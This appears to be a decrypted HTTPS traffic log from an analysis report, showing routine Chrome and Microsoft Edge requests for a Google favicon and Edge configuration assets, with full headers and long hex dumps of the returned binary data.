2024-07-26 18:10:24 UTC	881	OUT	GET /favicon.ico HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132", "Google Chrome";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://accounts.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-07-26 18:10:24 UTC	704	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable" Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]} Content-Length: 5430 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Fri, 26 Jul 2024 18:07:42 GMT Expires: Sat, 03 Aug 2024 18:07:42 GMT Cache-Control: public, max-age=691200 Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT Content-Type: image/x-icon Vary: Accept-Encoding Age: 162 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-07-26 18:10:24 UTC	686	IN	Data Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 30 fd fd fd 96 fd fd fd d8 fd fd fd f9 fd fd fd f9 fd fd fd d7 fd fd fd 94 fe fe fe 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd 99 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 95 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd c1 ff ff ff ff fa fd f9 ff b4 d9 a7 ff 76 ba 5d ff 58 ab 3a ff 58 aa 3a ff 72 b8 59 ff ac d5 9d ff f8 fb f6 ff ff Data Ascii: h& ( 0.v]X:X:rY
2024-07-26 18:10:24 UTC	1390	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d8 fd fd fd 99 ff ff ff ff 92 cf fb ff 37 52 ec ff 38 46 ea ff d0 d4 fa ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 96 fe fe fe 32 ff ff ff ff f9 f9 fe ff 56 62 ed ff 35 43 ea ff 3b 49 eb ff 95 9c f4 ff cf d2 fa ff d1 d4 fa ff 96 9d f4 ff 52 5e ed ff e1 e3 fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 30 00 00 00 00 fd fd fd 9d ff ff ff ff e8 ea fd ff 58 63 ee ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 6c 76 f0 ff ff ff ff ff ff ff ff ff fd fd fd 98 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd c3 ff ff ff ff f9 f9 fe ff a5 ac f6 ff 5d 69 ee ff 3c 4a eb Data Ascii: 7R8F2Vb5C;IR^0Xc5C5C5C5C5C5Clv]i<J
2024-07-26 18:10:24 UTC	1390	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff fd fd fd d0 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fd fd fd 8b ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff b1 d8 a3 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 60 a5 35 ff ca 8e 3e ff f9 c1 9f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 87 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 25 fd fd fd fb ff ff ff ff ff ff ff ff ff ff ff ff c2 e0 b7 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 6e b6 54 ff 9f ce 8d ff b7 da aa ff b8 db ab ff a5 d2 95 ff 7b bc 64 ff 54 a8 35 ff 53 a8 34 ff 77 a0 37 ff e3 89 41 ff f4 85 42 ff f4 85 42 ff fc Data Ascii: S4S4S4S4S4S4S4S4S4S4S4S4S4S4`5>%S4S4S4S4S4S4nT{dT5S4w7ABB
2024-07-26 18:10:24 UTC	1390	IN	Data Raw: f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff fb d5 bf ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd ea fd fd fd cb ff ff ff ff ff ff ff ff ff ff ff ff 46 cd fc ff 05 bc fb ff 05 bc fb ff 05 bc fb ff 21 ae f9 ff fb fb ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd c8 fd fd fd 9c ff ff ff ff ff ff ff ff ff ff ff ff 86 df fd ff 05 bc fb ff 05 bc fb ff 15 93 f5 ff 34 49 eb ff b3 b8 f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: BBBBBBF!4I
2024-07-26 18:10:24 UTC	574	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d2 fe fe fe 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd 8d fd fd fd fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd fb fd fd fd 8b fe fe fe 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 27 fd fd fd 9f fd fd fd f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: $'

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	64040	13.107.246.40	443	744	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:25 UTC	711	OUT	GET /assets/domains_config_gz/2.8.75/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Edge-Asset-Group: EntityExtractionDomainsConfig Sec-Mesh-Client-Edge-Version: 117.0.2045.47 Sec-Mesh-Client-Edge-Channel: stable Sec-Mesh-Client-OS: Windows Sec-Mesh-Client-OS-Version: 10.0.19045 Sec-Mesh-Client-Arch: x86_64 Sec-Mesh-Client-WebView: 0 Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-07-26 18:10:25 UTC	562	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:10:25 GMT Content-Type: application/octet-stream Content-Length: 79192 Connection: close Content-Encoding: gzip Last-Modified: Wed, 22 May 2024 23:09:58 GMT ETag: 0x8DC7AB44D2CA6C5 x-ms-request-id: 55790a49-f01e-003d-5438-dfdd21000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20240726T181025Z-15c77d89844qslxgp25v206ug0000000027000000000m5f9 Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 69316365 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-07-26 18:10:25 UTC	15822	IN	Data Raw: 1f 8b 08 08 46 7b 4e 66 02 ff 61 73 73 65 74 00 ec bd 0b 97 db 36 b2 30 f8 57 b2 b9 33 b3 dd 89 d5 d6 5b dd d9 cd fa f4 d3 f1 f8 39 6d 3b 19 db f1 d5 01 49 48 a2 45 91 0c 1f 6a ab c3 be bf 7d 0b 05 80 00 08 50 52 db ce 77 ef b7 67 67 9c 16 09 14 0a 40 a1 50 a8 2a 14 c0 3f bf f7 93 78 16 ce bf ff e9 bb 3f bf 2f 92 25 8d a7 51 b8 0a 0b 78 ef 8d bb dd 07 df 7d 9f 92 39 9d fa 65 91 cc 66 90 38 1c f4 59 62 40 67 a4 8c 8a 69 94 f8 24 a2 d3 15 49 11 81 c7 f0 c0 df 0e 3c 00 94 97 e3 6b de f1 08 7b a5 11 7b a5 51 67 9e e1 6b 8c af 71 a7 cc f1 15 81 69 de 59 7d c6 d7 02 5f 8b 0e a5 ec d5 c7 5c 3f ef f8 b7 ec 35 20 ec 35 20 9d 60 89 af 14 5f 69 27 40 e0 19 e6 ce 48 27 c4 8a 66 21 be 86 1d 78 60 af 19 be 66 9d 19 e6 2e b0 ec 82 76 c2 08 5f 31 77 91 75 16 3c b7 c4 d7 Data Ascii: F{Nfasset60W3[9m;IHEj}PRwgg@P*?x?/%Qx}9ef8Yb@gi$I<k{{QgkqiY}_\?5 5 `_i'@H'f!x`f.v_1wu<
2024-07-26 18:10:25 UTC	16384	IN	Data Raw: 30 96 c2 52 09 74 65 c0 2a 8a c3 88 95 9c 7c 3e a9 79 09 d4 fa 9a 9f 30 4a 49 28 2b d7 97 ff 7a 7b f9 fa cd f4 c9 05 68 2b 37 9c c1 08 01 cb 2f 28 f3 02 34 de 08 0c a6 34 da 38 c6 ec 48 27 33 28 96 9f 45 d9 4f 9f 12 f7 54 d2 47 a6 39 87 08 81 e9 6d 4f c1 43 97 10 bf ad 59 55 67 39 13 fe 1e 05 67 65 16 87 6c 9b f5 cb 90 60 eb 3d ea 25 09 33 8b f9 4a fb 10 ef 11 3b 7c e8 61 60 14 a0 60 b9 7c 16 e7 69 54 b1 c3 22 c0 e0 29 df c2 05 4c 8f bc f0 67 5e 04 75 33 51 9a b7 e1 61 1a 61 48 f5 c3 30 f7 62 91 d5 a8 34 39 2a 97 ff 2d f5 aa c1 c2 6c 78 e0 35 33 d1 42 b3 75 c4 be 3b f4 d0 68 83 51 a7 81 2d a0 ff 0d 5d 10 62 ed 7f 55 a5 99 9f 25 2b 2f a4 4d 09 21 65 43 c7 04 cf 93 19 f3 c1 d0 b6 e9 14 38 59 31 29 8b 4d 52 3a c4 97 c1 d0 1d 5d d0 58 b3 51 22 09 e8 37 c0 b1 Data Ascii: 0Rte\|>y0JI(+z{h+7/(448H'3(EOTG9mOCYUg9gel`=%3J;\|a``\|iT")Lg^u3QaaH0b49-lx53Bu;hQ-]bU%+/M!eC8Y1)MR:]XQ"7
2024-07-26 18:10:25 UTC	16384	IN	Data Raw: 4d 9a a5 bf dc f0 20 15 b1 bc 1f 82 9a 8d 98 a7 af db 80 6b 74 e7 ab 7c e6 18 7d 9a 2b 3e 34 2d 1a e7 c0 d5 e8 b4 a0 0e d4 7d 19 bb 69 52 58 a2 33 32 78 db 4b 2d cd 54 dd d2 2b 9c a0 29 69 1a ba 4a ee 0a 4d 33 5a 7b a7 1a 83 5f f3 f7 fe 2c 2f 84 3b 39 d0 56 82 ef 75 a4 f3 69 57 af 58 09 8c 2a 1d 24 b9 4e 6b cf 63 d0 74 99 e3 02 0f 26 7f 1a 86 a9 a8 69 fa 5a d8 25 83 c1 ea f8 fd 12 62 16 86 38 17 5a 19 6f 13 03 00 e6 6a 07 a4 40 be bb 20 de a6 de bf d1 06 75 32 1f c3 4f 67 41 ad 31 bd b0 9c ee 44 47 33 2a 92 9c d3 f6 35 64 a9 b1 d3 f6 b1 c7 a7 b4 80 af ea c1 2a 6c dd 81 a0 0b 67 ca d2 b2 11 7c 8d dc 39 47 56 d1 bd 08 e8 ec 3e 4f c9 56 d6 7a d3 9a 56 4d 17 50 41 9b 17 9b 37 36 da 2e 7c a4 ba 63 f5 72 cd 6b 58 b5 9b 70 5a 19 73 3e 85 d2 c6 f8 80 22 71 cd f5 Data Ascii: M kt\|}+>4-}iRX32xK-T+)iJM3Z{_,/;9VuiWX$Nkct&iZ%b8Zoj@ u2OgA1DG35d*lg\|9GV>OVzVMPA76.\|crkXpZs>"q
2024-07-26 18:10:25 UTC	16384	IN	Data Raw: d1 b5 2e 37 a4 97 5f 43 54 c9 8d d7 76 7a 14 e4 6f 3b 80 f7 6a 61 e8 6f 47 e9 2d cb 60 84 66 2b c0 b9 77 09 1b c0 32 5c aa 6c 0e 25 81 ed a0 5e 61 25 37 6f 3c a5 bc 1f 04 1a dd b1 04 1d c9 73 16 3a 58 a8 69 4d 12 c1 5e e9 66 5f 14 6c e4 9e d4 61 25 e1 2f c3 fc b8 ed df 80 5d 2b 3a 5b 4c 56 c9 72 1f 59 1d 6a 72 0b d2 b0 4c 8e d5 67 db 16 79 41 90 65 4f 4b 68 63 f6 d1 e5 db b6 6a 18 e6 ca 5f 04 79 2e 71 69 5d 0e 19 cc d9 f6 58 27 58 af 1c 18 04 f1 98 d2 bf 15 1e 37 ce e0 1e 88 54 83 3c 82 f8 a8 05 5f b0 1b 3f 2f 02 8f 31 a4 e9 1d ed 45 e6 e4 85 e6 b9 66 4c fd cd 8d e4 58 f7 79 73 8b 47 40 25 b6 0d 7f 78 ff a8 fe e7 7d 69 4a fc 00 c7 b0 37 a9 44 f0 40 1e e8 bd 41 8a b4 0a 5d 5a 2c 0e 60 f7 fb 81 3b 35 42 38 50 3b bc 9c d4 76 22 35 66 3f 5d d9 fb 8e 7d 65 84 Data Ascii: .7_CTvzo;jaoG-`f+w2\l%^a%7o<s:XiM^f_la%/]+:[LVrYjrLgyAeOKhcj_y.qi]X'X7T<_?/1EfLXysG@%x}iJ7D@A]Z,`;5B8P;v"5f?]}e
2024-07-26 18:10:25 UTC	14218	IN	Data Raw: e3 81 63 57 87 03 5d 30 c4 2c 68 be 29 95 24 e0 73 e2 94 ba 7c 22 47 ea b4 f3 4a ab de 10 bb 0f 22 b0 e3 03 f1 16 c4 09 e2 54 66 ca 62 e0 bd 45 b4 68 87 69 72 a9 a8 3a 28 8c ad c8 95 24 60 28 0b c5 a8 db e3 d5 17 cd 43 46 b4 fb 46 fd a3 14 49 08 2b a0 d4 0b 48 65 a7 34 02 ce 86 25 ec 4d 18 c8 06 95 b7 db ae 2c d4 04 dd 90 c7 1a 26 c2 da 18 8e c3 e7 b6 d0 48 5c c7 b0 14 4c 7c f1 b4 2a ac 33 ac 8a 9e 31 0d 6c 3e aa 0c 15 a1 45 32 ac 4e d6 6f ba 9a 27 26 95 df 33 99 0b 20 7d af b2 62 2d 9c ea d1 32 e1 30 9b 8a 31 68 6d 15 9c 98 ab c8 c6 e3 7e e5 00 84 e0 e3 a8 2a 88 4f 2a 47 73 00 26 98 78 bc 7a 46 b8 72 83 b9 60 67 8e 22 40 d7 fa c3 ee f3 d0 41 41 2f 43 d3 eb 75 57 f1 23 82 0d a8 53 cf 60 24 25 57 06 76 43 89 6b 4a 72 14 de 46 1b 3a c6 85 8c 15 a3 bd 21 af Data Ascii: cW]0,h)$s\|"GJ"TfbEhir:($`(CFFI+He4%M,&H\L\|31l>E2No'&3 }b-201hm~O*Gs&xzFr`g"@AA/CuW#S`$%WvCkJrF:!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	64048	13.107.246.40	443	744	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:26 UTC	470	OUT	GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Edge-Asset-Group: Shoreline Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-07-26 18:10:26 UTC	584	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:10:26 GMT Content-Type: application/octet-stream Content-Length: 306698 Connection: close Content-Encoding: gzip Last-Modified: Tue, 10 Oct 2023 17:24:31 GMT ETag: 0x8DBC9B5C40EBFF4 x-ms-request-id: 78767fe6-a01e-000c-32e7-de86f6000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20240726T181026Z-15c77d89844lpvk7kaceup6mys000000023g00000000axm7 Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 69316365 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-07-26 18:10:26 UTC	15800	IN	Data Raw: 1f 8b 08 08 cf 88 25 65 02 ff 61 73 73 65 74 00 ec 7d 69 93 db 46 92 e8 5f a9 f0 97 fd e0 96 05 10 00 09 4c c4 8b 17 2d f9 92 6d f9 92 6d 8d fd 66 43 51 00 0a 24 9a 20 40 e1 60 ab 7b 76 fe fb ab cc 2c 10 09 82 07 c8 a6 bc 9e 8d 0d 5b 68 b0 8e bc eb 44 55 e6 3f 3f 59 c9 3c 4d 54 55 bf db a8 b2 4a 8b fc 93 bf 89 4f dc cf ac cf ac 4f 6e c4 27 8b 26 7c 27 d7 eb 4a 27 fe bf 7f 7e 92 c6 90 19 c5 ee d4 f7 65 f0 4c f9 be ff cc f5 95 7c 26 63 df 7e 36 9b da 81 13 7b d3 d0 0e 15 d4 cd e5 4a 41 f9 77 ef 5e bf f9 ea 1d fc 7a f7 0e d2 19 1e fb 33 fd df 0c 12 63 55 45 65 ba ae 4d 06 d5 61 89 54 75 a9 1e 20 f7 f5 ab 57 2f 5e dd dd 7e ff 62 be 7c bf 58 a6 5f 05 f7 d6 8b db 9f be f8 f2 f6 f6 87 97 b7 3f f9 b7 90 ff 72 fe ad 7e ff e2 76 9d 58 77 ee 57 8b 1f de ff 14 f9 fe Data Ascii: %easset}iF_L-mmfCQ$ @`{v,[hDU??Y<MTUJOOn'&\|'J'~eL\|&c~6{JAw^z3cUEeMaTu W/^~b\|X_?r~vXwW
2024-07-26 18:10:26 UTC	16384	IN	Data Raw: a5 38 7d a8 02 c7 0a 04 ba b8 75 26 ce 55 c2 08 bf 5c 90 e7 68 0d 8c 7c 07 bb 14 ee 07 cf ac 5b ca 81 54 5b 25 f6 36 51 93 15 e8 c2 2b 22 50 fc 52 36 6d 55 35 59 19 67 e4 56 be d8 2d df fd 8c 1c b1 48 e9 85 d8 d5 6f a1 88 16 05 b8 ea d5 42 20 2f c6 fa c5 ab 21 ae b4 7e 71 4c 7c 69 3b da be 2c c4 3c 45 31 58 f6 5a d0 75 29 2d 10 91 2f b6 81 a8 f1 77 27 4d cb 46 c3 d1 f2 cb e7 17 7d 3c d0 6a 30 b1 ed 19 11 24 85 30 ed b3 77 98 0a a3 d3 4d 8a a4 58 a6 1a 92 6f 39 a0 66 5b a9 58 c4 f8 d7 db 13 a4 38 9f 53 18 72 e3 d6 58 c9 9c 2a 85 f1 21 3d 9d 12 35 51 d6 f4 74 9e 6e f9 3a 6f 4c fc e5 2c 53 f9 7a 94 a9 7c 50 ab 8e d8 56 01 86 95 11 92 ce 4d 82 a9 12 26 c6 7f 9c 55 b4 0d eb a8 c4 4f 75 f1 df 12 7e 7b 85 2d 18 bd 99 6f 4d 95 18 8d 35 7f b9 51 da bc b3 17 f2 61 Data Ascii: 8}u&U\h\|[T[%6Q+"PR6mU5YgV-HoB /!~qL\|i;,<E1XZu)-/w'MF}<j0$0wMXo9f[X8SrX*!=5Qtn:oL,Sz\|PVM&UOu~{-oM5Qa
2024-07-26 18:10:26 UTC	16384	IN	Data Raw: 56 c6 75 11 82 12 e0 b7 2c 9c d4 28 cd 82 09 ad 54 24 d2 ae 26 b9 4f 37 c4 67 1e 9d 6b d1 e4 03 44 91 0f c7 24 3e 9c a5 f8 80 ce e1 c3 bd 55 1f 7c 0d 7d f0 d6 f4 e1 f6 6d f9 6c 42 78 a7 7a 8f cf 80 2a 42 b1 ca af 46 95 01 06 85 53 be 7a 50 c8 12 ce 7e 7c 44 29 29 63 83 14 66 50 e5 69 9e ba 94 a2 14 a9 44 53 56 22 78 06 d0 d3 7d 25 3d 51 7e fc 63 e8 77 69 11 9c 24 cb 92 42 e9 e0 d4 ac cc c6 c2 0a 92 55 72 f4 61 88 91 31 1f 4c 69 b4 9b 0f a5 64 32 91 6a 99 5a 87 05 9b b8 18 4d b6 69 0c 05 60 46 80 c2 34 75 85 d5 88 cf a4 31 10 78 28 99 44 01 7e 6d 51 37 26 3d f1 aa c8 64 77 98 90 c3 4a 88 b9 d5 8c 73 bc 9b 5c 69 65 23 a6 fb 16 9b 26 25 05 ac fc cc 1e 87 56 e3 bd 7f 86 8d d9 de 4d 93 29 aa 7c fe d1 06 5b da c5 90 55 b0 c9 33 35 1b d9 51 ad b2 ea c6 9a c4 a2 Data Ascii: Vu,(T$&O7gkD$>U\|}mlBxz*BFSzP~\|D))cfPiDSV"x}%=Q~cwi$BUra1Lid2jZMi`F4u1x(D~mQ7&=dwJs\ie#&%VM)\|[U35Q
2024-07-26 18:10:26 UTC	16384	IN	Data Raw: 15 3e 36 a4 6a 67 7e 2a 42 7f 7e 14 be 1b ef d2 39 b9 d3 a0 0f a6 db fd c0 cf 6a 73 b5 e6 a0 67 39 bd 50 cf ce e5 f5 33 b4 5b f6 96 18 f6 1d 3d 5b 1c 62 ee 08 9c b4 27 31 5c bf 95 0d 07 a0 cf bc bf ec e9 f3 e3 25 7d d1 cd 7e e8 fe 69 3f 94 32 74 6d 41 40 30 f4 9d 21 ef 18 ab 09 e0 e5 30 bf 56 97 43 99 8d fb 5c b1 3a 15 2a 0c 9d 5f c9 d3 47 70 60 b0 6e 17 9c 16 bc 33 94 8f dc 87 1c 2e 65 5f 80 b0 c7 e2 bb 6a f4 3b c8 60 00 83 b2 83 02 16 e1 3f 69 68 e4 62 45 17 99 ba 9d 9d b7 00 7d 2a 5a 5f 88 af 8b 22 5d 84 79 61 b8 38 c9 2f d4 62 3c 2f ee 0a 38 04 98 69 d8 af 45 cf 43 a8 9b 3e 6e dd 69 b8 01 0b 4d c5 2a d4 d8 5d 7a b1 5f 94 d0 5d 79 e7 c9 87 c6 d5 b9 5d 89 1b 44 f3 5a 14 67 85 e9 1a ef c2 74 b9 63 86 3e c2 71 a7 08 94 eb 44 58 ad 1a 5c 09 02 5c 4d 1b c8 Data Ascii: >6jg~B~9jsg9P3[=[b'1\%}~i?2tmA@0!0VC\:_Gp`n3.e_j;`?ihbE}Z_"]ya8/b</8iEC>niM]z_]y]DZgtc>qDX\\M
2024-07-26 18:10:26 UTC	16384	IN	Data Raw: e5 2e b7 93 a4 b3 90 c2 6b ad 8a 70 f5 34 6b b8 40 3f ab 6c ff 6b b9 2f c1 49 79 7f 7f fe e2 4d 8e 52 97 9f 5c d2 a4 d2 9b 7f 21 19 ca ff db 31 e3 e4 f2 51 b8 7c 74 b3 4c aa e5 59 09 49 a3 cf 51 d6 87 a5 4c 6d 23 e7 30 3b 3e ce a2 ff dd d2 a2 4d 1f 0e 14 fd d7 52 7f fd 1c ea cf 13 55 dc a3 6d 85 4b 4e 63 b4 12 03 65 33 26 36 bd 72 f4 19 04 1a d9 86 f6 84 1c dd 9e ee 21 e8 65 4d aa 2f f0 f8 0a fb d1 85 1e 53 4d 3f 5f a5 fc d4 0d f8 28 79 f7 b1 c1 a5 fc 51 df bc 30 df bf cb 6f cb 2a 09 d7 1f 99 f4 19 6a 7e d9 a5 f8 7e 7b c5 59 31 55 b2 99 9f 7d 02 06 e8 6e c6 98 ec a9 7c 3f 2a 1d 34 e5 bd 0a 8f e7 88 3e 74 c3 0b e7 6b 10 2c 4f 53 5d 7c 86 e2 09 77 99 7d ee 02 3a 9d f3 a7 29 a2 13 79 ee 15 d2 a7 37 fd 67 b6 f7 67 33 72 df b2 23 59 ef 55 5d e5 6f cb 55 7e 43 Data Ascii: .kp4k@?lk/IyMR\!1Q\|tLYIQLm#0;>MRUmKNce3&6r!eM/SM?_(yQ0oj~~{Y1U}n\|?4>tk,OS]\|w}:)y7gg3r#YU]oU~C
2024-07-26 18:10:26 UTC	16384	IN	Data Raw: df 26 b7 09 e8 f5 8c 1d c0 e5 f5 0e 81 86 cd d1 7b 9c 8b 16 07 4d 31 65 8e 49 77 c3 9c 0b 06 79 cd 66 e0 72 84 3b 54 b9 74 ef 35 53 7d 3b 8c b0 a9 fd 1b 50 a9 de 74 45 72 7e 1b f0 2a c4 ee 75 56 a9 f1 4f 0b e2 ef 4c 0e 04 e6 c1 13 43 d1 a3 91 83 19 d3 3d c4 08 0f b5 d5 e1 f0 41 7b 02 cf 94 80 35 8c 5f 5f 02 90 85 fa 86 bb ab e1 02 93 a8 c3 01 b8 10 ce 1a 84 70 ba 2a 74 48 e2 74 7c 83 87 f5 42 38 70 15 c2 ce 65 08 08 86 a0 47 21 98 5b b8 58 62 21 c8 96 0d 6c 09 61 e7 32 c4 b3 5e a1 8d a0 20 7d 39 b0 28 5c c6 6d 21 84 b7 80 4c dc 70 c4 2e c4 f3 19 21 9c 8e d6 1f 96 d8 f4 9d 32 40 37 a4 47 84 1e d1 c7 65 89 5f 63 82 1d d4 5a 86 2d e5 f8 15 59 45 61 ea 67 ab 2d d9 61 85 e3 91 0f 94 e7 67 25 02 3d 4f 28 55 ad 17 c6 a0 29 6a 5d 21 2a cd 7e af 45 5e 0b 01 e5 6c Data Ascii: &{M1eIwyfr;Tt5S};PtEr~uVOLC=A{5__ptHt\|B8peG![Xb!la2^ }9(\m!Lp.!2@7Ge_cZ-YEag-ag%=O(U)j]!*~E^l
2024-07-26 18:10:26 UTC	16384	IN	Data Raw: c0 77 d7 f0 0b 75 ef b4 4f 20 01 c9 6e d7 8b d6 eb 26 ee 09 6d 06 c3 c0 20 42 f6 62 01 a8 b8 2e 41 68 d5 3e af 78 77 09 5e a1 a8 7e 3d bf 65 90 da ff 6d 58 c3 e3 86 29 f6 22 00 98 2a 9c 68 97 65 63 ac 5c ad 09 2b 23 82 8f 3f 2b 34 4c 1f 01 76 0d 06 ed 44 0f a9 a0 b1 63 30 c2 0d f2 ad 15 f9 9d a6 73 4a 64 c6 38 b2 91 d1 0a 38 ec f1 61 a5 51 a1 65 d6 96 da 34 5b b9 be df 70 92 06 98 c1 37 67 b8 7a fd 34 cd 5e 44 c0 aa b0 27 6e 0c f2 e2 f9 5e 7c 0a 17 b4 b4 16 73 66 52 b2 05 40 56 84 20 c3 90 88 0a 5a 8e f1 3d 96 59 b7 5f a7 63 31 3c 17 3a a9 04 30 4b 80 0e 09 8b 60 e1 5d df da 55 e1 6d 20 56 de 3a 5a 4e 4e 36 25 71 5c 12 7e f1 93 97 31 94 a1 29 89 f2 0a 40 a9 02 bf 55 03 2f 98 74 5f 78 73 cb c5 29 4c e9 ad ef d3 e0 e9 ec 15 b9 9a 03 cf 91 db 7e f5 f0 08 3e Data Ascii: wuO n&m Bb.Ah>xw^~=emX)"*hec\+#?+4LvDc0sJd88aQe4[p7gz4^D'n^\|sfR@V Z=Y_c1<:0K`]Um V:ZNN6%q\~1)@U/t_xs)L~>
